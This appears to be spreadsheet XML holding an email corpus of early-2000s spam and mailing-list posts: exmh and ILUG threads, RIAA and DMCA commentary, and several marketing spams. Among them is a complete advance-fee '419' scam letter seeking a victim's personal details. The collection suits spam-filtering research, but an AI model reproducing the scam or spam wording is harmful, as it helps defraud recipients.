 &lt;/SELECT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD&gt;Height:&lt;/TD&gt;&lt;TD&gt;&lt;INPUT NAME=3DHEIGHT SIZE=3D10&gt;=
 &lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;
 &lt;TD&gt;Weight:&lt;/TD&gt;&lt;TD&gt;&lt;INPUT NAME=3DWEIGHT SIZE=3D3&gt; lbs&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD&gt;To=
 bacco Use:&lt;/TD&gt;&lt;TD&gt;&lt;SELECT NAME=3DTOBACCO_USE SIZE=3D1&gt;&lt;OPTION SELECTED&gt;(P=
 lease
 Select)&lt;OPTION&gt;Have never smoked or used nicotine&lt;OPTION&gt;Used to smoke, bu=
 t quit less than 1 yr ago&lt;OPTION&gt;Used to
 smoke 1-3 yrs ago&lt;OPTION&gt;Used to smoke 3-5 yrs ago&lt;OPTION&gt;Used to smoke ov=
 er 5 yrs ago&lt;OPTION&gt;Currently smoke cigarettes&lt;OPTION&gt;Other
 nicotine use-cigars/pipe/chew/patch&lt;/SELECT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD&gt;Health Statu=
 s:&lt;/TD&gt;&lt;TD&gt;&lt;SELECT NAME=3DHEALTH_STATUS&gt;&lt;OPTION SELECTED&gt;(Please
 Select)&lt;OPTION&gt;Excellent: trim and athletic, no medications&lt;OPTION&gt;Good:
 no infirmities and no medications&lt;OPTION&gt;Fair: slightly overweight
 or taking medication&lt;OPTION&gt;Poor: have/had a serious health condition&lt;/SEL=
 ECT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;TR&gt;&lt;TD&gt;Health conditions?&lt;BR&gt;&lt;INPUT NAME=3DHEALTHPROBS TYPE=3DRADIO =
 VALUE=3DYES&gt;Yes&lt;INPUT CHECKED NAME=3DHEALTHPROBS TYPE=3DRADIO VALUE=3DNO&gt;N=
 o&lt;/TD&gt;&lt;TD&gt;Explain:&lt;BR&gt;&lt;TEXTAREA NAME=3DHEALTHPROBSDESC&gt;&lt;/TEXTAREA&gt;&lt;/TD&gt;&lt;/T=
 R&gt;&lt;TR&gt;&lt;TD&gt;Prescription medications?&lt;BR&gt;&lt;INPUT NAME=3DTAKERX TYPE=3DRADIO V=
 ALUE=3DYES&gt;Yes&lt;INPUT CHECKED NAME=3DTAKERX TYPE=3DRADIO VALUE=3DNO&gt;No&lt;/TD&gt;=
 &lt;TD&gt;Explain:&lt;BR&gt;&lt;TEXTAREA NAME=3DTAKERXDESC&gt;&lt;/TEXTAREA&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD&gt;D=
 o you engage in any hazardous activities?&lt;BR&gt;(i.e. scuba,skydiving,private=
  pilot,etc.)&lt;BR&gt;&lt;INPUT NAME=3DHAZAVOCOCC TYPE=3DRADIO VALUE=3DYES&gt;Yes&lt;INPU=
 T CHECKED NAME=3DHAZAVOCOCC TYPE=3DRADIO VALUE=3DNO&gt;No&lt;/TD&gt;&lt;TD&gt;Explain:&lt;BR=
 &gt;&lt;TEXTAREA NAME=3DHAZAVOCOCCDESC&gt;&lt;/TEXTAREA&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD&gt;Did your par=
 ents or siblings have&lt;BR&gt; heart disease or cancer prior to age 60?&lt;BR&gt;&lt;INP=
 UT NAME=3DFAMILYHISTORY TYPE=3DRADIO 
 VALUE=3DYES&gt;Yes&lt;INPUT CHECKED NAME=3DFAMILYHISTORY TYPE=3DRADIO VALUE=3DNO=
 &gt;No&lt;/TD&gt;&lt;TD&gt;Explain:&lt;BR&gt;&lt;TEXTAREA NAME=3DFAMILYHISTORYDESC&gt;&lt;/TEXTAREA&gt;&lt;/TD=
 &gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;DIV ALIGN=3DCENTER&gt;&lt;INPUT TYPE=3DSUBMIT VALUE=3D"Submit Quo=
 te Request"&gt;&lt;/DIV&gt;&lt;P&gt;&lt;TABLE&gt;&lt;TR&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;TD STYLE=3DFONT-SIZE:10PT=
 &gt;If you are in receipt of this email in error and/or wish to be removed fr=
 om our list, &lt;A HREF=3D"mailto:jc6@btamail.net.cn"&gt;PLEASE CLICK HERE&lt;/A&gt; A=
 ND TYPE REMOVE. If you reside in any state which prohibits email solicitat=
 ions for insurance, please disregard this email.&lt;/TD&gt;&lt;/TR&gt;
 &lt;b&gt;
 &lt;b&gt;
 &lt;b&gt;
 &lt;b&gt;
 &lt;/TR&gt;&lt;TR&gt;&lt;TD&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 We will open your email application to submit your inquiry. All quotes wil=
 l be from insurance companies rated A-, A, A+ or A++ by A.M. Best. Actual =
 premiums and coverage availability will vary depending upon age, sex, stat=
 e, health history and tobacco use. THIS IS NOT AN OFFER OR CONTRACT TO BUY=
  INSURANCE PRODUCTS, but rather a confidential informational inquiry.  Lif=
 e Quote Search is an information gathering service and does not sell insur=
 ance.  All information submitted is strictly confidential, and will be giv=
 en to an insurance professional licensed in your state of residence, who w=
 ill contact you and provide your quote directly. 
 &lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Google Domain Suffix Census
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85481526
 Date: Not supplied
 The good folks at ResearchBuzz have released a groovy Google API tool, "The 
 Suffix Census." Enter your search terms, and the census will tell you how many 
 of the results are in .NET, .COM, .ORG, and other top-level domains. Link[1] 
 Discuss[2] (_via ResearchBuzz[3]_)
 [1] http://www.buzztoolbox.com/google/suffixcensus.shtml
 [2] http://www.quicktopic.com/boing/H/k9WDFNMrPbW5
 [3] http://www.researchbuzz.com/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: This little domain went to China....
</t>
  </si>
  <si>
    <t xml:space="preserve">The RIAA continues to amaze me.    Everyone might want to grok the
 news yahoo has:
 http://rd.yahoo.com/dailynews/nm/tc_nm/inlinks/*http://Listen4ever.com
 And if you're really bored, go ahead and read the papers that were
 filed by the RIAA against the major backbone providers.
 http://www.riaa.com/pdf/Listen4Ever.pdf
 So it looks like the RIAA is getting bored with its usual tack of
 suing the peer-to-peer services, and is instead using the DMCA
 to sue ISPs and backbones into compliance --  They want said backbones
 to block the ip address of the listen4ever.com server due to
 listen4ever's alleged infringement of copyright.  To quote
 the Motion that the RIAA issued:  "Plaintiffs request that
 the Court issue a preliminary injunction requiring Defendants to block
 communication to and from Listen4ever's servers that travel through
 Defendants' backbone routing systems".
 At least according to the RIAA (probably for bonus terror tactics )
 the Listen4ever site is even more formidable than that bane of p2p
 goodness, Napster, due to the fact that its on a centralized server,
 out of their reach of RIAA/DMCA control (its located in China), and
 because according to the RIAA it facilitates the downloading of entire albums.
 Apparently listen4ever has a few other sites floating around, and the RIAA has been
 unsuccessful in getting any of them to voluntarily surrender
 service(1).
 Gotta love the RIAA for jumping into this lawsuit with the customer's
 interests in mind.  How lawyers can write drivel along the lines of
 'if you dont stop these guys, we'll run out of money and we won't be
 able to supply you new music!' just blows my mind, especially in this
 day and age.   The RIAA has enough money to file inane lawsuits
 against backbone providers, but they don't have enough money to
 produce new artists?  Something seems wrong here.
 Here's my problem.  Say the RIAA wins in court, and the backbone
 providers comply.   Their biggest hurdle is now accomplished, and one
 hell of a terrible precident is/can be set.   At least in the RIAA's
 case, I'm sure once they get a Court-mandated Ok for this particular
 site, they'll just go ahead, write their nice friendly lawyer letters,
 and demand that subsequent IP addresses also be blocked, as they too
 route to sites that are problematic to the RIAA.
 Even worse, the concept that other groups (the first that flashed into
 my little brain being the Scientologists) also decide that this is the way
 to go.   If the RIAA prevails, they have record set, albiet in NY
 only, that can be pointed back to, and used in other cases.
 Eventually this will hit a large enough court that precident will set,
  and we have a very quiet, very non-reported event occuring from then
  on, the systematic C&amp;Ding of the Internet.   Anything that violates the
 DMCA, given its takedown provisions, might now potentially
 fall prey to a Cease &amp; Desist letter.  Rather than appealing, the
 backbone providers will just agree -- as they seem likely to do
 'provided a court order'.
 Point being is that soon this won't take a court order.  A nastygram
 will suffice and we'll wonder where all the new
 music/information/dissenting opinions/ criticisms went.
 This is a scary road we're running down here.   So nice to see that
 its still hush-hush in the geek community.
 Whats more bizzare is some of the support(?) that the RIAA seemed to
 get.   I'm curious for instance, how Dave Farber got dragged into
 this...  (2) Dave, you still read FoRK?
 (1) Save for one, lmp3.com, which was listed as a redirect site in the
 court documents, has since gone down.   Their website has a humorous little note:  "Lmp3
 will be closed and will never come back! ".  Listen4ever.com is not
 responding, but i'm not quite sure if thats due to backbone compliance
 or the site being overburdened.
 (2) Declaration of Prof. David J. Farber:
 http://www.riaa.com/pdf/Listen4Ever.pdf (p. 95)
 A very disgruntled,
 bitbitch
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt;&gt;&gt;&gt;&gt; On Thu, 22 Aug 2002, "Chris" == Chris Garrigues wrote:
   Chris&gt; --==_Exmh_267413022P Content-Type: text/plain;
   Chris&gt; charset=us-ascii
   +&gt; From:  Anders Eriksson &lt;aeriksson@fastmail.fm&gt; Date:  Thu, 22 Aug
   +&gt; 2002 20:23:17 +0200
   +&gt; Oooops!
   +&gt; Doesn't work at all. Got this on startup and on any attempt to
   +&gt; change folde r (which fail)
   Chris&gt; ~sigh~ I'd already found that and checked it in....apparently
   Chris&gt; I did so after you checked it out and before you sent this
   Chris&gt; mail...I hoped I was fast enough that you wouldn't see it.
   Chris&gt; Try again!
 Works like a charm. It's like the box was on drugs or something. 
 However, while testing it a selected my favourite folder (l-k) and 
 marked ~400 messages unread. THAT took forever, or about as long as 
 Catch-up Unseen did before. Any suggestions?
 /A
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: vkatalov@elcomsoft.com: Security warning draws DMCA threat
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Looks like HP is using the DMCA to prevent full disclosure of
 security vulnerablities. This is not a good precedent...
 ----- Forwarded message from Vladimir Katalov &lt;vkatalov@elcomsoft.com&gt; -----
 From: Vladimir Katalov &lt;vkatalov@elcomsoft.com&gt;
 Reply-To: Vladimir Katalov &lt;vkatalov@elcomsoft.com&gt;
 Organization: ElcomSoft Co.Ltd.
 Subject: [DMCA_Discuss] Security warning draws DMCA threat
 Date: Wed, 31 Jul 2002 15:04:26 +0400
 http://news.com.com/2100-1023-947325.html?tag=fd_top
 By Declan McCullagh
 Staff Writer, CNET News.com
 July 30, 2002, 4:48 PM PT
 WASHINGTON--Hewlett Packard has found a new club to use to pound
 researchers who unearth flaws in the company's software: the Digital
 Millennium Copyright Act.
 Invoking both the controversial 1998 DMCA and computer crime laws, HP
 has threatened to sue a team of researchers who publicized a
 vulnerability in the company's Tru64 Unix operating system.
 In a letter sent on Monday, an HP vice president warned SnoSoft, a
 loosely organized research collective, that it "could be fined up to
 $500,000 and imprisoned for up to five years" for its role in
 publishing information on a bug that lets an intruder take over a
 Tru64 Unix system.
 HP's dramatic warning appears to be the first time the DMCA has been
 invoked to stifle research related to computer security. Until now,
 it's been used by copyright holders to pursue people who distribute
 computer programs that unlock copyrighted content such as DVDs or
 encrypted e-books.
 If HP files suit or persuades the federal government to prosecute, the
 company could set a precedent that stifles research into computer
 security flaws, a practice that frequently involves publishing code
 that demonstrates vulnerabilities. The DMCA restricts code that "is
 primarily designed or produced for the purpose of circumventing
 protection" of copyrighted works.
 On July 19, a researcher at SnoSoft posted a note to
 SecurityFocus.com's popular Bugtraq mailing list with a hyperlink to a
 computer program letting a Tru64 user gain full administrator
 privileges. The researcher, who goes by the alias "Phased," said in
 the message: "Here is the warez, nothing special, but it does the
 job."
 That public disclosure drew the ire of Kent Ferson, a vice president
 in HP's Unix systems unit, who alleged in his letter on Monday that
 the post violated the DMCA and the Computer Fraud and Abuse Act.
 [...]
 _______________________________________________
 ------------------------
 http://www.anti-dmca.org
 ------------------------
 DMCA_Discuss mailing list
 DMCA_Discuss@lists.microshaft.org
 http://lists.microshaft.org/mailman/listinfo/dmca_discuss
 ----- End forwarded message -----
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_1988991284P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Scott Lipcon &lt;slipcon@mercea.net&gt;
 &gt; Date:  Sun, 22 Sep 2002 22:58:16 -0400
 &gt;
 &gt; I just updated to the latest CVS - I had been running a build from June.  
 &gt; Hitting the Flist button gives the following traceback:
 &gt; 
 &gt; syntax error in expression "int(17+1+(222-)*(19-17-2)/(224-))"
 &gt;     while executing
 &gt; "expr int($minLine+1+($msgid-$minMsg)*($maxLine-$minLine-2)/($maxMsg-$minMs
 &gt; g))"
 &gt;     (procedure "Ftoc_FindMsg" line 57)
 &gt;     invoked from within
 &gt; "Ftoc_FindMsg $i"
 &gt;     (procedure "Ftoc_ShowSequences" line 16)
 &gt;     invoked from within
 &gt; "Ftoc_ShowSequences $F"
 &gt;     (procedure "ScanFolder" line 81)
 &gt;     invoked from within
 &gt; "ScanFolder inbox 0"
 &gt;     invoked from within
 &gt; "time [list ScanFolder $F $adjustDisplay"
 &gt;     (procedure "Scan_Folder" line 2)
 &gt;     invoked from within
 &gt; "Scan_Folder $exmh(folder) $ftoc(showNew)"
 &gt;     (procedure "Inc_PresortFinish" line 7)
 &gt;     invoked from within
 &gt; "Inc_PresortFinish"
 &gt;     invoked from within
 &gt; ".fops.flist invoke"
 &gt;     ("uplevel" body line 1)
 &gt;     invoked from within
 &gt; "uplevel #0 [list $w invoke]"
 &gt;     (procedure "tkButtonUp" line 7)
 &gt;     invoked from within
 &gt; "tkButtonUp .fops.flist
 &gt; "
 &gt;     (command bound to event)
 &gt; 
 &gt; 
 &gt; It seems to only happen in a folder with no unseen messages.
 &gt; 
 &gt; Chris, is this related to your recent changes?
 Curious.  I changed the arguments to Ftoc_ShowSequences to drop the folder 
 argument and instead have an optional msgids argument.  Somehow your version 
 of ScanFolder is still trying to pass $F.  You seem to have the latest 
 ftoc.tcl (1.36), but not the latest scan.tcl (1.27).
 I don't know how that happened, but try getting your source tree completely 
 up to date.
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_1988991284P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9jygSK9b4h5R0IUIRAix6AJ9CorKpwn/5KatPB2QytCyr1mVP5QCfd84d
 CBV9usxWABobTcDTVHm8fLY=
 =xJhj
 -----END PGP SIGNATURE-----
 --==_Exmh_1988991284P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Darren Kenny wrote:
 &gt; Hi,
 &gt; 
 &gt; I've got an normal 3.5" CD-RW IDE drive that I'd like to be able to use 
 &gt; with a Dell Latitude CPx laptop that I've got. Does anyone know any way 
  &gt; enable this, for example through the use of a special cable for the
  &gt; Modular Bay (where CD-ROM or floppy drive is normally).
 There is absolutely no way to use a conventional 3.5" drive with a
 laptop directly. However, you can get an external firewire or USB
 cradle and attach it to the laptop like that, and any 3.5" drive
 will work in that case.
 Example :
 http://www.microsense.com/USB_35_combo.asp
 Regards,
 Vin
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Help wanted.  We are a 14 year old fortune 500 company, that is
 growing at a tremendous rate.  We are looking for individuals who
 want to work from home.
 This is an opportunity to make an excellent income.  No experience
 is required.  We will train you.
 So if you are looking to be employed from home with a career that has
 vast opportunities, then go:
 http://www.basetel.com/wealthnow
 We are looking for energetic and self motivated people.  If that is you
 than click on the link and fill out the form, and one of our
 employement specialist will contact you.
 To be removed from our link simple go to:
 http://www.basetel.com/remove.html
 4592gPjt0-916msGW0934HwlS5-965Tqzv4189Rjvx0-174yaja0756SEjNl56
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: BIG 12 OR BUST
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;!-- originally sent to ler+foxsports@lerctr.org --&gt;
 &lt;head&gt;
 &lt;title&gt;BIG 12 OR BUST&lt;/title&gt;
 &lt;base href="http://foxsports.lycos.com/?CMP=NL6964"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#FFFFFF" text="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"&gt;
 &lt;table width="757" border="0" cellspacing="0" cellpadding="0"&gt;
 &lt;tr align="left" valign="top"&gt;
 &lt;td colspan="2"&gt;&lt;img src="/blobs/active/640176_36_1.jpg" width="757" height="90"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td bgcolor="DAA32F" width="143" align="left" valign="top"&gt;
 &lt;p&gt;&lt;img src="/blobs/active/640178_36_1.jpg" width="145" height="501" usemap="#Map2" border="0"&gt;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;/td&gt;
 &lt;td bgcolor="DAA32F" width="614" align="left" valign="top"&gt;
 &lt;table width="499" border="0" cellspacing="0" cellpadding="0" bgcolor="EEEEEE"&gt;
 &lt;tr align="left" valign="top"&gt;
 &lt;td&gt;&lt;a href="http://switchboard.real.com/partners/?src=R1R.fox.0.general.link.0.foxsports.BigXIIEmail&amp;CMP=NL6964"&gt;&lt;img src="/blobs/active/640180_36_1.jpg" width="499" height="110" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td align="left" valign="top" bgcolor="EEEEEE"&gt;
 &lt;table width="499" border="0" cellspacing="0" cellpadding="8"&gt;
 &lt;tr&gt;
 &lt;td align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="3"&gt;This
 weekend you can see the Nebraska Cornhuskers, Utah State, Kansas
 State and the University of Louisiana/Monroe - LIVE AND EXCLUSIVELY
 ON THE INTERNET! &lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;FOXSports.com
 presents BIG 12 football!&lt;/font&gt;&lt;/b&gt; Now you can see your favorite
 teams play, even if you can't get to a live game or it's not
 on TV.&lt;br&gt;
 &lt;br&gt;
 FOXSports.com has partnered with RealOne to bring Big 12 football
 fans LIVE webcasts that put you in the stands - even from home.&lt;br&gt;
 &lt;br&gt;
 The best part... you can get ALL of the webcasts and exclusive
 Big 12 news, highlights and coverage by becoming a member of
 RealOne SuperPass. With SuperPass you get:&lt;br&gt;
 &lt;br&gt;
 &lt;/font&gt;
 &lt;li&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;All
 Big 12 webcasts, highlights and exclusive coverage&lt;/font&gt;&lt;/li&gt;
 &lt;li&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Unaired
 video footage from FOX Sports and FOX Sports Net&lt;/font&gt;&lt;/li&gt;
 &lt;li&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Exclusive
 video from channels like NASCAR.com and MLB.com&lt;/font&gt;&lt;/li&gt;
 &lt;li&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Plus,
 top news content from ABCNews.com and CNN.com&lt;/font&gt;&lt;/li&gt;
 &lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;
 &lt;br&gt;&lt;br&gt;
 True to your school? Only want certain games? You can get them individually too!&lt;/font&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;center&gt;
 &lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="4"&gt;Sign up
 now! &lt;a href="http://switchboard.real.com/partners/?src=R1R.fox.0.general.link.0.foxsports.BigXIIEmail&amp;CMP=NL6964"&gt;Click
 here.&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;p&gt;
 &lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="4"&gt;Want more
 details? &lt;a href="http://foxsports.lycos.com/named/Features/bigXII?CMP=NL6964"&gt;Click
 here.&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 &lt;/font&gt;&lt;/center&gt;&lt;br&gt;
 &lt;/a&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;/b&gt;&lt;/font&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;p&gt;&lt;center&gt;
 &lt;a href="mailto:remove@foxsports.com?subject=REMOVE%202157%20ler+foxsports@lerctr.org" &gt;&lt;font size="-2" face=
 "Arial, Helvetica, sans-serif" color="#99349C"&gt;To unsubscribe from future FOXSports.com emails, click
 here.&lt;/font&gt;&lt;/a&gt;
 &lt;/center&gt;&lt;/p&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;p&gt;
 &lt;p&gt;
 &lt;p&gt;
 &lt;p&gt;
 &lt;p&gt;
 &lt;p&gt;
 &lt;p&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;map name="Map"&gt;
 &lt;area shape="circle" coords="72,188,66" href="http://foxsports.lycos.com/section/section_front.adp?categoryId=21&amp;CMP=NL6964"&gt;
 &lt;/map&gt;&lt;map name="Map2"&gt;
 &lt;area shape="circle" coords="75,202,49" href="http://foxsports.lycos.com/?CMP=NL6964"&gt;
 &lt;/map&gt;
 &lt;img src="http://ai.hitbox.com/ai?hb=DM520329A1SZ95EN3&amp;ai=NL6964" width="1" height="1" border="0"&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: I'm on TV tonight
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85483339
 Date: Not supplied
 Tonight on the Style Network's TV show "Area," my house will be featured 
 undergoing a Hawaiiana makeover. Watch it and meet Carla, my daughter, and me. 
 It'll play Monday at 9:30 pm ET. (If someone can tape it for me, I'd appreciate 
 it, because my cable service doesn't get the Style channel. I'll send you a new 
 T-shirt iron on of a girl and her pet slug. Email mark@well.com.) Link[1] 
 Discuss[2]
 [1] http://www.stylenetwork.com/Shows/Area/
 [2] http://www.quicktopic.com/16/H/FtMUhwVP3JS6E
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] ASSISTANCE
</t>
  </si>
  <si>
    <t xml:space="preserve">FROM: COL. MICHAEL BUNDU. 
 DEMOCRATIC REPUBLIC OF CONGO. 
 Tel No: Your country Intl. access code +8821652098236
 email : mikebundu@rediffmail.com
 Dear Sir/Madam
 SEEKING YOUR IMMEDIATE ASSISTANCE. 
 Please permit me to make your acquaintance in so informal a manner. This
 is necessitated by my urgent need to reach a 
 dependable and trust worthy foreign partner. This request may seem strange
 and unsolicited but I crave your indulgence 
 and pray that you view it seriously. My name is COL. MICHAEL BUNDU of the
 Democratic Republic of Congo and one of 
 the close aides to the former President of the Democratic Republic of
 Congo LAURENT KABILA of blessed memory, may 
 his soul rest in peace. 
 Due to the military campaign of LAURENT KABILA to force out the rebels in
 my country, I and some of my colleagues were 
 instructed by Late President Kabila to go abroad to purchase arms and
 ammunition worth of Twenty Million, Five Hundred 
 Thousand United States Dollars only (US$20,500,000.00) to fight the rebel
 group. We were then given this money privately 
 by the then President, LAURENT KABILA, without the knowledge of other
 Cabinet Members. But when President Kabila 
 was killed in a bloody shoot-out by one of his bodyguards a day before we
 were schedule to travel out of Congo, We 
 immediately decided to put the funds into a private security company here
 in Congo for safe keeping. The security of the 
 said amount is presently being threatened here following the arrest and
 seizure of properties of Col. Rasheidi Karesava 
 (One of the aides to Laurent Kabila) a tribesman, and some other Military
 Personnel from our same tribe, by the new 
 President of the Democratic Republic of Congo, the son of late President
 Laurent Kabila, Joseph Kabila. 
 In view of this, we need a reliable and trustworthy foreign partner who
 can assist us to move this money out of my country 
 as the beneficiary. 
 WE have sufficient ''CONTACTS'' here to move the fund under Diplomatic
 Cover to a security company in Europe in your 
 name. This is to ensure that the Diplomatic Baggage is marked
 ''CONFIDENTIAL'' and it 
 will not pass through normal custom/airport screening and clearance. 
 Our inability to move this money out of Congo all this while stems from
 our lack of trust of our supposed good friends 
 (western countries) who suddenly became hostile to those of us who worked
 with the late President Kabila, immediately 
 after his son took office. Though we have neither seen nor met each other,
 the information We gathered from an associate 
 who has worked in your country has encouraged and convinced us that with
 your sincere assistance, this transaction will 
 be properly handled with modesty and honesty to a huge success within two
 weeks. The said money is a state fund and 
 therefore requires a total confidentiality. 
 We would please need you to stand on our behalf as the beneficiary of this
 fund in Europe. This is because we are under 
 restricted movement and watch and hence we want to be very careful in
 order not to lose this fund which we have worked 
 so hard for. Thus, if you are willing to assist us to move this fund out
 of Congo, you can contact me through my email 
 addresses, Tel/Fax nos. above with your telephone, fax number and personal
 information to enable us discuss the 
 modalities and what will be your share (percentage) for assisting us.
 Please note that There are no RISKS involved in this Deal as everyone's
 Security is Guaranteed if we follow the required 
 guidelines. I will hence furnish you with further details of this Deal as
 soon as I am assured of your Sincere interest to assist 
 us. 
 I must use this opportunity and medium to implore you to exercise the
 utmost indulgence to keep this matter extraordinarily 
 confidential, Whatever your decision, while I await your prompt response.
 Thank you and God Bless. 
 Best Regards 
 COL. MICHAEL BUNDU(RTD). m_bundu@rediffmail.com
 N\B. When you are calling my line, you dial your country Intl. access
 code, then you dial directly, do not include my country 
 code i.e. (243). Just dial your country Intl. access code + 88216
 52098236. You can also contact me through the above 
 email addresses.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: $500 1st Annuity Sale Bonus
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_237950_01C1F52E.BB0EE1E0
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: quoted-printable
  Rising Rates Guaranteed=0A=
 UP Your Income...First Sale Bonus $500=09
  	=20
 A New GUARANTEED ANNUITY
 That Keeps Going UP And UP And UP....
 =09
 Increasing Rates - All Guaranteed 	Flexible or Single Premiums =09
 Nursing Home Waiver* 	Issue Age 0-85** =09
  Rising Interest Rates Graph=09
  Rex Huffman &amp; Associates=0A=
 800-749-9900 ext. 123=0A=
 Call today...$500 Bonus=09
 =09
 Please fill out the form below for more information	=20
 Name:	  	 Insurance IQ Logo=09
 E-mail:	  =09
 Phone:	  =09
 City:	  	State:	  =09
  	  	 	   =09
  =20
 *Most States. **Surrender charge varies for ages 56+ in CT, IN, MD, OK,
 SC. Contracts issued by and bonus sponsored by USG Annuity &amp; Life
 Company/Equitable Life Insurance Company of Iowa, 909 Locust Street, Des
 Moines, IA 50309. For agents only. Rates subject to change. Product and
 features not available in all states. IRAs/qualified plans are already
 tax deferred. Consider other annuity features. We reserve the right to
 alter or end bonuses at any time. Minimum premium for bonus $20,000.
 (AD020257). =09
 We don't want anyone to receive our mailings who does not wish to. This
 is professional communication sent to insurance professionals. To be
 removed from this mailing list, DO NOT REPLY to this message. Instead,
 go here: http://www.insurancemail.net
 Legal Notice &lt;http://www.insiq.com/legal.htm&gt;=20
 ------=_NextPart_000_237950_01C1F52E.BB0EE1E0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;$500 1st Annuity Sale Bonus&lt;/TITLE&gt;
 &lt;BODY bgColor=3D#FFFFFF link=3D#ffffff text=3D#000000&gt;
 &lt;BR&gt;
 &lt;TABLE align=3Dcenter bgColor=3D#000000 cellPadding=3D0 cellSpacing=3D2 =
 width=3D550&gt;
   &lt;TR&gt;=20
     &lt;TD vAlign=3Dtop&gt;=20
       &lt;TABLE bgColor=3D#000000 border=3D0 cellPadding=3D0 =
 cellSpacing=3D0 width=3D"100%"&gt;
         &lt;TR&gt;=20
           &lt;TD colSpan=3D2 vAlign=3Dtop&gt;&lt;IMG alt=3D"Rising Rates =
 Guaranteed&amp;#10;UP Your Income...First Sale Bonus $500" height=3D267 =
 src=3D"http://63.211.81.87/images/huffman/20020410-1a.jpg" =
 width=3D550&gt;&lt;/TD&gt;
         &lt;/TR&gt;
         &lt;TR&gt;=20
           &lt;TD colSpan=3D2 vAlign=3Dtop&gt;&amp;nbsp;&lt;/TD&gt;
         &lt;/TR&gt;
         &lt;TR&gt;=20
           &lt;TD align=3D"center" colSpan=3D2&gt;
             &lt;B&gt;&lt;FONT color=3D#ffffff face=3D"Arial, Helvetica, =
 sans-serif" size=3D4&gt;A New GUARANTEED ANNUITY&lt;BR&gt;
             That Keeps Going UP And UP And UP....&lt;BR&gt;&lt;/FONT&gt;&lt;/B&gt;=20
           &lt;/TD&gt;
         &lt;/TR&gt;
